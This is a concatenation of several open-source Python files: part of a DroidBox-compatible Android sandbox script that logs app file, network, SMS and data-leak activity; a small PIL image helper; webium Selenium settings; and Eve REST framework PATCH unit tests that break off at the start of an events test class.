self.applicationStarted = 1
break
except:
break
if (self.applicationStarted == 0):
print("Analysis has not been done.")
# Kill ADB, otherwise it will never terminate
os.kill(self.adb.pid, signal.SIGTERM)
sys.exit(1)
print("Application started")
def start_unblocked(self, duration=0):
droidbox_thread = threading.Thread(target=self.start_blocked, args=(duration,))
droidbox_thread.start()
def stop(self):
self.enabled = False
if self.timer and self.timer.isAlive():
self.timer.cancel()
if self.adb is not None:
self.adb.terminate()
self.adb = None
def start_blocked(self, duration=0):
if not self.enabled:
return
# curses.setupterm()
# sys.stdout.write(curses.tigetstr("clear"))
sys.stdout.flush()
call(["adb", "wait-for-device"])
call(['adb', 'logcat', '-c'])
print " ____ __ ____"
print "/\ _`\ __ /\ \/\ _`\\"
print "\ \ \/\ \ _ __ ___ /\_\ \_\ \ \ \L\ \ ___ __ _"
print " \ \ \ \ \/\`'__\ __`\/\ \ /'_` \ \ _ <' / __`\/\ \/'\\"
print " \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \\ \L\ \/> </"
print " \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\\"
print " \/___/ \/_/\/___/ \/_/\/__,_ /\/___/ \/___/ \//\/_/"
count = CountingThread()
count.start()
timeStamp = time.time()
if duration:
self.timer = threading.Timer(duration, self.stop)
self.timer.start()
if self.adb is None:
self.adb = Popen(["adb", "logcat", "-v", "threadtime", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Collect DroidBox logs
self.is_counting_logs = True
self.lastScreenshot = 0
first_log_time = None
from droidbot.state_monitor import StateMonitor
state_monitor = StateMonitor()
state_monitor.start()
while self.enabled:
try:
if self.output_dir and (time.time() - self.lastScreenshot) >=5:
# Take screenshots every 5 seconds.
os.system("adb shell screencap -p | sed 's/\r$//' > %s" % os.path.join(self.output_dir, "screen") \
+ "_$(date +%Y-%m-%d_%H%M%S).png")
self.lastScreenshot = time.time()
logcatInput = self.adb.stdout.readline()
if not logcatInput:
raise LostADBException("We have lost the connection with ADB.")
from droidbot import utils
log_data = utils.parse_log(logcatInput)
if log_data is None or log_data['tag'] != "DroidBox":
continue
log_time = log_data['datetime']
if first_log_time is None:
first_log_time = log_time
log_delta_seconds = (log_time - first_log_time).total_seconds()
log_content = json.loads(decode(log_data['content']))
# DroidBox style report
try:
# dirty workaround: filter out the logs produced by DroidBot
# self.filter_noises(log_content)
# DexClassLoader
if log_content.has_key('DexClassLoader'):
log_content['DexClassLoader']['type'] = 'dexload'
self.dexclass[log_delta_seconds] = log_content['DexClassLoader']
count.increaseCount()
# service started
if log_content.has_key('ServiceStart'):
log_content['ServiceStart']['type'] = 'service'
self.servicestart[log_delta_seconds] = log_content['ServiceStart']
count.increaseCount()
# received data from net
if log_content.has_key('RecvNet'):
host = log_content['RecvNet']['srchost']
port = log_content['RecvNet']['srcport']
self.recvnet[log_delta_seconds] = recvdata = {'type': 'net read', 'host': host,
'port': port,
'data': log_content['RecvNet']['data']}
count.increaseCount()
# fdaccess
if log_content.has_key('FdAccess'):
self.accessedfiles[log_content['FdAccess']['id']] = hexToStr(log_content['FdAccess']['path'])
# file read or write
if log_content.has_key('FileRW'):
log_content['FileRW']['path'] = self.accessedfiles[log_content['FileRW']['id']]
if log_content['FileRW']['operation'] == 'write':
log_content['FileRW']['type'] = 'file write'
else:
log_content['FileRW']['type'] = 'file read'
self.fdaccess[log_delta_seconds] = log_content['FileRW']
count.increaseCount()
# opened network connection log
if log_content.has_key('OpenNet'):
self.opennet[log_delta_seconds] = log_content['OpenNet']
count.increaseCount()
# closed socket
if log_content.has_key('CloseNet'):
self.closenet[log_delta_seconds] = log_content['CloseNet']
count.increaseCount()
# outgoing network activity log
if log_content.has_key('SendNet'):
log_content['SendNet']['type'] = 'net write'
self.sendnet[log_delta_seconds] = log_content['SendNet']
count.increaseCount()
# data leak log
if log_content.has_key('DataLeak'):
my_time = log_delta_seconds
log_content['DataLeak']['type'] = 'leak'
log_content['DataLeak']['tag'] = getTags(int(log_content['DataLeak']['tag'], 16))
self.dataleaks[my_time] = log_content['DataLeak']
count.increaseCount()
if log_content['DataLeak']['sink'] == 'Network':
log_content['DataLeak']['type'] = 'net write'
self.sendnet[my_time] = log_content['DataLeak']
count.increaseCount()
elif log_content['DataLeak']['sink'] == 'File':
log_content['DataLeak']['path'] = self.accessedfiles[log_content['DataLeak']['id']]
if log_content['DataLeak']['operation'] == 'write':
log_content['DataLeak']['type'] = 'file write'
else:
log_content['DataLeak']['type'] = 'file read'
self.fdaccess[my_time] = log_content['DataLeak']
count.increaseCount()
elif log_content['DataLeak']['sink'] == 'SMS':
log_content['DataLeak']['type'] = 'sms'
self.sendsms[my_time] = log_content['DataLeak']
count.increaseCount()
# sent sms log
if log_content.has_key('SendSMS'):
log_content['SendSMS']['type'] = 'sms'
self.sendsms[log_delta_seconds] = log_content['SendSMS']
count.increaseCount()
# phone call log
if log_content.has_key('PhoneCall'):
log_content['PhoneCall']['type'] = 'call'
self.phonecalls[log_delta_seconds] = log_content['PhoneCall']
count.increaseCount()
# crypto api usage log
if log_content.has_key('CryptoUsage'):
log_content['CryptoUsage']['type'] = 'crypto'
self.cryptousage[log_delta_seconds] = log_content['CryptoUsage']
count.increaseCount()
except ValueError:
pass
except KeyboardInterrupt:
break
except LostADBException:
break
except Exception as e:
print(e.message)
continue
self.is_counting_logs = False
count.stopCounting()
count.join()
# Kill ADB, otherwise it will never terminate
self.stop()
self.adb = None
print json.dumps(self.get_output())
if self.output_dir is None:
return
with open(os.path.join(self.output_dir, "analysis.json"),"w") as jsonfile:
jsonfile.write(json.dumps(self.get_output(),sort_keys=True, indent=4))
def get_output(self):
# Done? Store the objects in a dictionary, transform it in a dict object and return it
output = dict()
# Sort the items by their key
output["dexclass"] = self.dexclass
output["servicestart"] = self.servicestart
output["recvnet"] = self.recvnet
output["opennet"] = self.opennet
output["sendnet"] = self.sendnet
output["closenet"] = self.closenet
output["accessedfiles"] = self.accessedfiles
output["dataleaks"] = self.dataleaks
output["fdaccess"] = self.fdaccess
output["sendsms"] = self.sendsms
output["phonecalls"] = self.phonecalls
output["cryptousage"] = self.cryptousage
output["recvsaction"] = self.application.getRecvsaction()
output["enfperm"] = self.application.getEnfperm()
output["hashes"] = self.apk_hashes
output["apkName"] = self.apk_name
return output
def get_counts(self):
output = dict()
# Sort the items by their key
output["dexclass"] = len(self.dexclass)
output["servicestart"] = len(self.servicestart)
output["recvnet"] = len(self.recvnet)
output["opennet"] = len(self.opennet)
output["sendnet"] = len(self.sendnet)
output["closenet"] = len(self.closenet)
output["dataleaks"] = len(self.dataleaks)
output["fdaccess"] = len(self.fdaccess)
output["sendsms"] = len(self.sendsms)
output["phonecalls"] = len(self.phonecalls)
output["cryptousage"] = len(self.cryptousage)
output["sum"] = sum(output.values())
return output
def filter_noises(self, log):
"""
        filter useless noise from the log
        :param log: log of DroidBox in dict format
        :return: the (possibly reduced) log dict
"""
if isinstance(log, dict):
# DexClassLoader
if 'DexClassLoader' in log.keys():
if log['DexClassLoader']['path'] in DEXCLASSLOADER_EXCLUDED:
log.pop('DexClassLoader')
# fdaccess
if 'FdAccess' in log.keys():
for excluded_prefix in FDACCESS_EXCLUDED_PREFIX:
if hexToStr(log['FdAccess']['path']).startswith(excluded_prefix):
log.pop('FdAccess')
break
# file read or write
if 'FileRW' in log.keys():
if log['FileRW']['id'] not in self.accessedfiles.keys():
log.pop('FileRW')
return log
DEXCLASSLOADER_EXCLUDED = [
"/system/framework/monkey.jar",
"/system/framework/input.jar",
"/system/framework/am.jar",
]
FDACCESS_EXCLUDED_PREFIX = [
"pipe:",
"socket:",
"/dev/input/event",
]
class CountingThread(Thread):
"""
Used for user interface, showing in progress sign
and number of collected logs from the sandbox system
"""
def __init__(self):
"""
Constructor
"""
Thread.__init__(self)
self.stop = False
self.logs = 0
def stopCounting(self):
"""
Mark to stop this thread
"""
self.stop = True
def increaseCount(self):
self.logs += 1
def run(self):
"""
Update the progress sign and
number of collected logs
"""
signs = ['|', '/', '-', '\\']
counter = 0
while 1:
sign = signs[counter % len(signs)]
sys.stdout.write(" \033[132m[%s] Collected %s sandbox logs\033[1m (Ctrl-C to view logs)\r" % (
sign, str(self.logs)))
sys.stdout.flush()
time.sleep(0.5)
counter = counter + 1
if self.stop:
sys.stdout.write(
" \033[132m[%s] Collected %s sandbox logs\033[1m%s\r" % ('*', str(self.logs), ' ' * 25))
sys.stdout.flush()
break
class Application:
"""
Used for extracting information of an Android APK
"""
def __init__(self, filename):
self.filename = filename
self.packageNames = []
self.enfperm = []
self.permissions = []
self.recvs = []
self.activities = {}
self.recvsaction = {}
self.mainActivity = None
def processAPK(self):
xml = {}
error = True
try:
zip = zipfile.ZipFile(self.filename)
for i in zip.namelist():
if i == "AndroidManifest.xml":
try:
xml[i] = minidom.parseString(zip.read(i))
except:
xml[i] = minidom.parseString(AXMLPrinter(zip.read(i)).getBuff())
for item in xml[i].getElementsByTagName('manifest'):
self.packageNames.append(str(item.getAttribute("package")))
for item in xml[i].getElementsByTagName('permission'):
self.enfperm.append(str(item.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('uses-permission'):
self.permissions.append(str(item.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('receiver'):
self.recvs.append(str(item.getAttribute("android:name")))
for child in item.getElementsByTagName('action'):
self.recvsaction[str(item.getAttribute("android:name"))] = (
str(child.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('activity'):
activity = str(item.getAttribute("android:name"))
self.activities[activity] = {}
self.activities[activity]["actions"] = list()
for child in item.getElementsByTagName('action'):
self.activities[activity]["actions"].append(str(child.getAttribute("android:name")))
for activity in self.activities:
for action in self.activities[activity]["actions"]:
if action == 'android.intent.action.MAIN':
self.mainActivity = activity
error = False
break
if (error == False):
return 1
else:
return 0
except:
return 0
def getEnfperm(self):
return self.enfperm
def getRecvsaction(self):
return self.recvsaction
def getMainActivity(self):
return self.mainActivity
def getActivities(self):
return self.activities
def getPermissions(self):
return self.permissions
def getRecvActions(self):
return self.recvsaction
def getPackage(self):
# One application has only one package name
return self.packageNames[0]
def getHashes(self, block_size=2 ** 8):
"""
Calculate MD5,SHA-1, SHA-256
hashes of APK input file
"""
md5 = hashlib.md5()
sha1 = hashlib.sha1()
sha256 = hashlib.sha256()
f = open(self.filename, 'rb')
while True:
data = f.read(block_size)
if not data:
break
md5.update(data)
sha1.update(data)
sha256.update(data)
return [md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()]
def decode(s, encodings=('ascii', 'utf8', 'latin1')):
for encoding in encodings:
try:
return s.decode(encoding)
except UnicodeDecodeError:
pass
return s.decode('ascii', 'ignore')
def getTags(tagParam):
"""
Retrieve the tag names
"""
tagsFound = []
for tag in tags.keys():
if tagParam & tag != 0:
tagsFound.append(tags[tag])
return tagsFound
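# For example, getTags(0x402) reports TAINT_CONTACTS and TAINT_IMEI
# (0x2 | 0x400), in whatever order the tags dict iterates.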
def hexToStr(hexStr):
"""
Convert a string hex byte values into a byte string
"""
bytes = []
hexStr = ''.join(hexStr.split(" "))
for i in range(0, len(hexStr), 2):
bytes.append(chr(int(hexStr[i:i + 2], 16)))
return unicode(''.join(bytes), errors='replace')
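# For example, hexToStr("68 69") and hexToStr("6869") both decode to u"hi".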
def interruptHandler(signum, frame):
"""
Raise interrupt for the blocking call 'logcatInput = sys.stdin.readline()'
"""
raise KeyboardInterrupt
def main():
argv = sys.argv
if len(argv) < 2 or len(argv) > 3:
print("Usage: droidbox_compatible.py filename.apk <duration in seconds>")
sys.exit(1)
duration = 0
# Duration given?
if len(argv) == 3:
duration = int(argv[2])
apkName = sys.argv[1]
# APK existing?
if os.path.isfile(apkName) == False:
print("File %s not found" % argv[1])
sys.exit(1)
droidbox = DroidBox()
droidbox.set_apk(apkName)
droidbox.start_blocked(duration)
# droidbox.get_output()
if __name__ == "__main__":
main()
|
nastya/droidbot
|
droidbox_scripts/droidbox_compatible.py
|
Python
|
mit
| 24,119 | 0.006468 |
# -*- coding: UTF-8 -*-
'''
Created on 2015-01-18
@author: RobinTang
'''
try:
import Image, ImageDraw, ImageFont, ImageFilter
except:
pass
try:
from PIL import Image, ImageDraw, ImageFont, ImageFilter
except:
pass
import StringIO
filters = {
    ('blur', ImageFilter.BLUR, 'blur filter'),
    ('contour', ImageFilter.CONTOUR, 'contour'),
    ('edge_enhance', ImageFilter.EDGE_ENHANCE, 'edge enhancement'),
    ('edge_enhance_more', ImageFilter.EDGE_ENHANCE_MORE, 'edge enhancement (stronger threshold)'),
    ('emboss', ImageFilter.EMBOSS, 'emboss filter'),
    ('find_edges', ImageFilter.FIND_EDGES, 'edge-finding filter'),
    ('smooth', ImageFilter.SMOOTH, 'smoothing filter'),
    ('smooth_more', ImageFilter.SMOOTH_MORE, 'smoothing filter (stronger threshold)'),
    ('sharpen', ImageFilter.SHARPEN, 'sharpening filter'),
}
filtersmap = dict([(v[0], (v[1], v[2])) for v in filters])
def getfont(size):
import os, sys
try:
file_name = os.path.dirname(sys.modules['img'].__file__)
path = os.path.abspath(file_name)
except:
path = ''
font = ImageFont.truetype(os.path.join(path, "font.ttf"), size)
return font
def fitto(src, dw=360, dh=200):
dst = Image.new("RGBA", (dw, dh), (255, 255, 255, 0))
sw = src.size[0]
sh = src.size[1]
kw = float(sw) / float(dw)
kh = float(sh) / float(dh)
w, h = 0, 0
if kw > kh:
w, h = int(dw), int(sh / kw)
else:
w, h = int(sw / kh), int(dh)
nsrc = src.resize((w, h),)
x = (dw - w) / 2
y = (dh - h) / 2
dst.paste(nsrc, (x, y, x + w, y + h))
return dst
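# For example, fitting an 800x600 source onto the default 360x200 canvas
# resizes it to 266x200 and pastes it at x=47, y=0, leaving transparent
# margins on the left and right.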
def watermark(m, s, color=(0, 0, 0, 255), size=20):
draw = ImageDraw.Draw(m)
font = getfont(size)
fsize = font.getsize(s)
draw.text((m.size[0] - fsize[0] - fsize[1] / 5, m.size[1] - fsize[1]), s, font=font, fill=color)
return m
def getimg(path):
if path.startswith("http://") or path.startswith("https://"):
import urllib2
import io
dats = io.BytesIO(urllib2.urlopen(path).read())
m = Image.open(dats)
# dats.close()
return m
else:
return Image.open(path)
def getimgwithdats(dats):
m = Image.open(dats)
return m
def getimgbytes(m, fmt="png"):
out = StringIO.StringIO()
m.save(out, fmt)
out.seek(0)
dats = out.read()
out.close()
return dats
if __name__ == "__main__":
m = getimg("http://img0.bdstatic.com/img/image/shouye/xinshouye/meishi116.jpg")
m = fitto(m, 300, 300)
m = watermark(m, "Powered by Sin")
m.show()
|
sintrb/urlimg
|
img/funs.py
|
Python
|
gpl-2.0
| 2,541 | 0.006528 |
from selenium.webdriver import Firefox
from selenium.webdriver.common.by import By
driver_class = Firefox
implicit_timeout = 30
wait_timeout = 30
default_search_type = By.ID
try:
from local_webium_settings import *
except ImportError:
pass
|
drptbl/webium
|
webium/settings.py
|
Python
|
apache-2.0
| 251 | 0 |
from bson import ObjectId
import simplejson as json
from eve.tests import TestBase
from eve.tests.test_settings import MONGO_DBNAME
from eve.tests.utils import DummyEvent
from eve import STATUS_OK, LAST_UPDATED, ID_FIELD, ISSUES, STATUS, ETAG
from eve.methods.patch import patch_internal
class TestPatch(TestBase):
def test_patch_to_resource_endpoint(self):
_, status = self.patch(self.known_resource_url, data={})
self.assert405(status)
def test_readonly_resource(self):
_, status = self.patch(self.readonly_id_url, data={})
self.assert405(status)
def test_unknown_id(self):
_, status = self.patch(self.unknown_item_id_url,
data={"key1": 'value1'})
self.assert404(status)
def test_unknown_id_different_resource(self):
# patching a 'user' with a valid 'contact' id will 404
_, status = self.patch('%s/%s/' % (self.different_resource,
self.item_id),
data={"key1": "value1"})
self.assert404(status)
# of course we can still patch a 'user'
_, status = self.patch('%s/%s/' % (self.different_resource,
self.user_id),
data={'key1': '{"username": "username1"}'},
headers=[('If-Match', self.user_etag)])
self.assert200(status)
def test_by_name(self):
_, status = self.patch(self.item_name_url, data={'key1': 'value1'})
self.assert405(status)
def test_ifmatch_missing(self):
_, status = self.patch(self.item_id_url, data={'key1': 'value1'})
self.assert403(status)
def test_ifmatch_disabled(self):
self.app.config['IF_MATCH'] = False
r, status = self.patch(self.item_id_url, data={'key1': 'value1'})
self.assert200(status)
self.assertTrue(ETAG not in r)
def test_ifmatch_bad_etag(self):
_, status = self.patch(self.item_id_url,
data={'key1': 'value1'},
headers=[('If-Match', 'not-quite-right')])
self.assert412(status)
def test_unique_value(self):
# TODO
# for the time being we are happy with testing only Eve's custom
# validation. We rely on Cerberus' own test suite for other validation
# unit tests. This test also makes sure that response status is
        # syntactically correct in case of validation issues.
# We should probably test every single case as well (seems overkill).
r, status = self.patch(self.item_id_url,
data={"ref": "%s" % self.alt_ref},
headers=[('If-Match', self.item_etag)])
self.assertValidationErrorStatus(status)
self.assertValidationError(r, {'ref': "value '%s' is not unique" %
self.alt_ref})
def test_patch_string(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_integer(self):
field = "prog"
test_value = 9999
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_list_as_array(self):
field = "role"
test_value = ["vendor", "client"]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertTrue(set(test_value).issubset(db_value))
def test_patch_rows(self):
field = "rows"
test_value = [
{'sku': 'AT1234', 'price': 99},
{'sku': 'XF9876', 'price': 9999}
]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
for test_item in test_value:
self.assertTrue(test_item in db_value)
def test_patch_list(self):
field = "alist"
test_value = ["a_string", 99]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_dict(self):
field = "location"
test_value = {'address': 'an address', 'city': 'a city'}
changes = {field: test_value}
original_city = []
def keep_original_city(resource_name, updates, original):
original_city.append(original['location']['city'])
self.app.on_update += keep_original_city
self.app.on_updated += keep_original_city
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
self.assertEqual(original_city[0], original_city[1])
def test_patch_datetime(self):
field = "born"
test_value = "Tue, 06 Nov 2012 10:33:31 GMT"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_objectid(self):
field = "tid"
test_value = "4f71c129c88e2018d4000000"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_null_objectid(self):
# verify that #341 is fixed.
field = "tid"
test_value = None
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_defaults(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
r = self.perform_patch(changes)
self.assertRaises(KeyError, self.compare_patch_with_get, 'title', r)
def test_patch_defaults_with_post_override(self):
field = "ref"
test_value = "1234567890123456789012345"
r = self.perform_patch_with_post_override(field, test_value)
self.assert200(r.status_code)
self.assertRaises(KeyError, self.compare_patch_with_get, 'title',
json.loads(r.get_data()))
def test_patch_multiple_fields(self):
fields = ['ref', 'prog', 'role']
test_values = ["9876543210987654321054321", 123, ["agent"]]
changes = {"ref": test_values[0], "prog": test_values[1],
"role": test_values[2]}
r = self.perform_patch(changes)
db_values = self.compare_patch_with_get(fields, r)
for i in range(len(db_values)):
self.assertEqual(db_values[i], test_values[i])
def test_patch_with_post_override(self):
# a POST request with PATCH override turns into a PATCH request
r = self.perform_patch_with_post_override('prog', 1)
self.assert200(r.status_code)
def test_patch_internal(self):
# test that patch_internal is available and working properly.
test_field = 'ref'
test_value = "9876543210987654321098765"
data = {test_field: test_value}
with self.app.test_request_context(self.item_id_url):
r, _, _, status = patch_internal(
self.known_resource, data, concurrency_check=False,
**{'_id': self.item_id})
db_value = self.compare_patch_with_get(test_field, r)
self.assertEqual(db_value, test_value)
self.assert200(status)
def test_patch_etag_header(self):
        # test that Etag is always included with the response header. See #562.
changes = {"ref": "1234567890123456789012345"}
headers = [('Content-Type', 'application/json'),
('If-Match', self.item_etag)]
r = self.test_client.patch(self.item_id_url,
data=json.dumps(changes),
headers=headers)
self.assertTrue('Etag' in r.headers)
def test_patch_nested(self):
changes = {'location.city': 'a nested city',
'location.address': 'a nested address'}
r = self.perform_patch(changes)
values = self.compare_patch_with_get('location', r)
self.assertEqual(values['city'], 'a nested city')
self.assertEqual(values['address'], 'a nested address')
def perform_patch(self, changes):
r, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assert200(status)
self.assertPatchResponse(r, self.item_id)
return r
def perform_patch_with_post_override(self, field, value):
headers = [('X-HTTP-Method-Override', 'PATCH'),
('If-Match', self.item_etag),
('Content-Type', 'application/json')]
return self.test_client.post(self.item_id_url,
data=json.dumps({field: value}),
headers=headers)
def compare_patch_with_get(self, fields, patch_response):
raw_r = self.test_client.get(self.item_id_url)
r, status = self.parse_response(raw_r)
self.assert200(status)
self.assertEqual(raw_r.headers.get('ETag'),
patch_response[ETAG])
if isinstance(fields, str):
return r[fields]
else:
return [r[field] for field in fields]
def test_patch_allow_unknown(self):
changes = {"unknown": "unknown"}
r, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assertValidationErrorStatus(status)
self.assertValidationError(r, {'unknown': 'unknown field'})
self.app.config['DOMAIN'][self.known_resource]['allow_unknown'] = True
r, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assert200(status)
self.assertPatchResponse(r, self.item_id)
def test_patch_x_www_form_urlencoded(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
headers = [('If-Match', self.item_etag)]
r, status = self.parse_response(self.test_client.patch(
self.item_id_url, data=changes, headers=headers))
self.assert200(status)
self.assertTrue('OK' in r[STATUS])
def test_patch_referential_integrity(self):
data = {"person": self.unknown_item_id}
headers = [('If-Match', self.invoice_etag)]
r, status = self.patch(self.invoice_id_url, data=data, headers=headers)
self.assertValidationErrorStatus(status)
expected = ("value '%s' must exist in resource '%s', field '%s'" %
(self.unknown_item_id, 'contacts',
self.app.config['ID_FIELD']))
self.assertValidationError(r, {'person': expected})
data = {"person": self.item_id}
r, status = self.patch(self.invoice_id_url, data=data, headers=headers)
self.assert200(status)
self.assertPatchResponse(r, self.invoice_id)
def test_patch_write_concern_success(self):
# 0 and 1 are the only valid values for 'w' on our mongod instance (1
# is the default)
self.domain['contacts']['mongo_write_concern'] = {'w': 0}
field = "ref"
test_value = "X234567890123456789012345"
changes = {field: test_value}
_, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assert200(status)
def test_patch_write_concern_fail(self):
# should get a 500 since there's no replicaset on the mongod instance
self.domain['contacts']['mongo_write_concern'] = {'w': 2}
field = "ref"
test_value = "X234567890123456789012345"
changes = {field: test_value}
_, status = self.patch(self.item_id_url,
data=changes,
headers=[('If-Match', self.item_etag)])
self.assert500(status)
def test_patch_missing_standard_date_fields(self):
"""Documents created outside the API context could be lacking the
LAST_UPDATED and/or DATE_CREATED fields.
"""
        # directly insert a document, without DATE_CREATED and LAST_UPDATED
# values.
contacts = self.random_contacts(1, False)
ref = 'test_update_field'
contacts[0]['ref'] = ref
_db = self.connection[MONGO_DBNAME]
_db.contacts.insert(contacts)
# now retrieve same document via API and get its etag, which is
        # supposed to be computed on default DATE_CREATED and LAST_UPDATED
# values.
response, status = self.get(self.known_resource, item=ref)
etag = response[ETAG]
_id = response['_id']
# attempt a PATCH with the new etag.
field = "ref"
test_value = "X234567890123456789012345"
changes = {field: test_value}
_, status = self.patch('%s/%s' % (self.known_resource_url, _id),
data=changes, headers=[('If-Match', etag)])
self.assert200(status)
def test_patch_subresource(self):
_db = self.connection[MONGO_DBNAME]
# create random contact
fake_contact = self.random_contacts(1)
fake_contact_id = _db.contacts.insert(fake_contact)[0]
# update first invoice to reference the new contact
_db.invoices.update({'_id': ObjectId(self.invoice_id)},
{'$set': {'person': fake_contact_id}})
# GET all invoices by new contact
response, status = self.get('users/%s/invoices/%s' %
(fake_contact_id, self.invoice_id))
etag = response[ETAG]
data = {"inv_number": "new_number"}
headers = [('If-Match', etag)]
response, status = self.patch('users/%s/invoices/%s' %
(fake_contact_id, self.invoice_id),
data=data, headers=headers)
self.assert200(status)
self.assertPatchResponse(response, self.invoice_id)
def test_patch_bandwidth_saver(self):
changes = {'ref': '1234567890123456789012345'}
# bandwidth_saver is on by default
self.assertTrue(self.app.config['BANDWIDTH_SAVER'])
r = self.perform_patch(changes)
self.assertFalse('ref' in r)
db_value = self.compare_patch_with_get(self.app.config['ETAG'], r)
self.assertEqual(db_value, r[self.app.config['ETAG']])
self.item_etag = r[self.app.config['ETAG']]
# test return all fields (bandwidth_saver off)
self.app.config['BANDWIDTH_SAVER'] = False
r = self.perform_patch(changes)
self.assertTrue('ref' in r)
db_value = self.compare_patch_with_get(self.app.config['ETAG'], r)
self.assertEqual(db_value, r[self.app.config['ETAG']])
def test_patch_readonly_field_with_previous_document(self):
schema = self.domain['contacts']['schema']
del(schema['ref']['required'])
# disable read-only on the field so we can store a value which is
# also different form its default value.
schema['read_only_field']['readonly'] = False
changes = {'read_only_field': 'value'}
r = self.perform_patch(changes)
# resume read-only status for the field
self.domain['contacts']['schema']['read_only_field']['readonly'] = True
# test that if the read-only field is included with the payload and its
# value is equal to the one stored with the document, validation
# succeeds (#479).
etag = r['_etag']
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', etag)])
self.assert200(status)
self.assertPatchResponse(r, self.item_id)
# test that if the read-only field is included with the payload and its
# value is different from the stored document, validation fails.
etag = r['_etag']
changes = {'read_only_field': 'another value'}
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', etag)])
self.assert422(status)
self.assertTrue('is read-only' in r['_issues']['read_only_field'])
def test_patch_nested_document_not_overwritten(self):
""" Test that nested documents are not overwritten on PATCH and #519
is fixed.
"""
schema = {
'sensor': {
"type": "dict",
"schema": {
"name": {"type": "string"},
"lon": {"type": "float"},
"lat": {"type": "float"},
"value": {"type": "float", "default": 10.3},
"dict": {
'type': 'dict',
'schema': {
'string': {'type': 'string'},
'int': {'type': 'integer'},
}
}
}
},
'test': {
'type': 'string',
'readonly': True,
'default': 'default'
}
}
self.app.config['BANDWIDTH_SAVER'] = False
self.app.register_resource('sensors', {'schema': schema})
changes = {
'sensor': {
'name': 'device_name',
'lon': 43.4,
'lat': 1.31,
'dict': {'int': 99}
}
}
r, status = self.post("sensors", data=changes)
self.assert201(status)
id, etag, value, test, int = (
r[ID_FIELD],
r[ETAG],
r['sensor']['value'],
r['test'],
r['sensor']['dict']['int']
)
changes = {
'sensor': {
'lon': 10.0,
'dict': {'string': 'hi'}
}
}
r, status = self.patch(
"/%s/%s" % ('sensors', id),
data=changes,
headers=[('If-Match', etag)]
)
self.assert200(status)
etag, value, int = (
r[ETAG],
r['sensor']['value'],
r['sensor']['dict']['int']
)
self.assertEqual(value, 10.3)
self.assertEqual(test, 'default')
self.assertEqual(int, 99)
def test_patch_nested_document_nullable_missing(self):
schema = {
'sensor': {
'type': 'dict',
'schema': {
'name': {'type': 'string'},
},
'default': None,
},
'other': {
'type': 'dict',
'schema': {
'name': {'type': 'string'},
},
}
}
self.app.config['BANDWIDTH_SAVER'] = False
self.app.register_resource('sensors', {'schema': schema})
changes = {}
r, status = self.post("sensors", data=changes)
self.assert201(status)
id, etag = r[ID_FIELD], r[ETAG]
self.assertTrue('sensor' in r)
self.assertEqual(r['sensor'], None)
self.assertFalse('other' in r)
changes = {
'sensor': {'name': 'device_name'},
'other': {'name': 'other_name'},
}
r, status = self.patch(
"/%s/%s" % ('sensors', id),
data=changes,
headers=[('If-Match', etag)]
)
self.assert200(status)
self.assertEqual(r['sensor'], {'name': 'device_name'})
self.assertEqual(r['other'], {'name': 'other_name'})
def test_patch_dependent_field_on_origin_document(self):
""" Test that when patching a field which is dependent on another and
this other field is not provided with the patch but is still present
on the target document, the patch will be accepted. See #363.
"""
# this will fail as dependent field is missing even in the
# document we are trying to update.
del(self.domain['contacts']['schema']['dependency_field1']['default'])
del(self.domain['contacts']['defaults']['dependency_field1'])
changes = {'dependency_field2': 'value'}
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', self.item_etag)])
self.assert422(status)
# update the stored document by adding dependency field.
changes = {'dependency_field1': 'value'}
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', self.item_etag)])
self.assert200(status)
# now the field2 update will be accepted as the dependency field is
# present in the stored document already.
etag = r['_etag']
changes = {'dependency_field2': 'value'}
r, status = self.patch(self.item_id_url, data=changes,
headers=[('If-Match', etag)])
self.assert200(status)
def assertPatchResponse(self, response, item_id):
self.assertTrue(STATUS in response)
self.assertTrue(STATUS_OK in response[STATUS])
self.assertFalse(ISSUES in response)
self.assertTrue(ID_FIELD in response)
self.assertEqual(response[ID_FIELD], item_id)
self.assertTrue(LAST_UPDATED in response)
self.assertTrue(ETAG in response)
self.assertTrue('_links' in response)
self.assertItemLink(response['_links'], item_id)
def patch(self, url, data, headers=[]):
headers.append(('Content-Type', 'application/json'))
r = self.test_client.patch(url,
data=json.dumps(data),
headers=headers)
return self.parse_response(r)
class TestEvents(TestBase):
new_ref = "0123456789012345678901234"
def test_on_pre_PATCH(self):
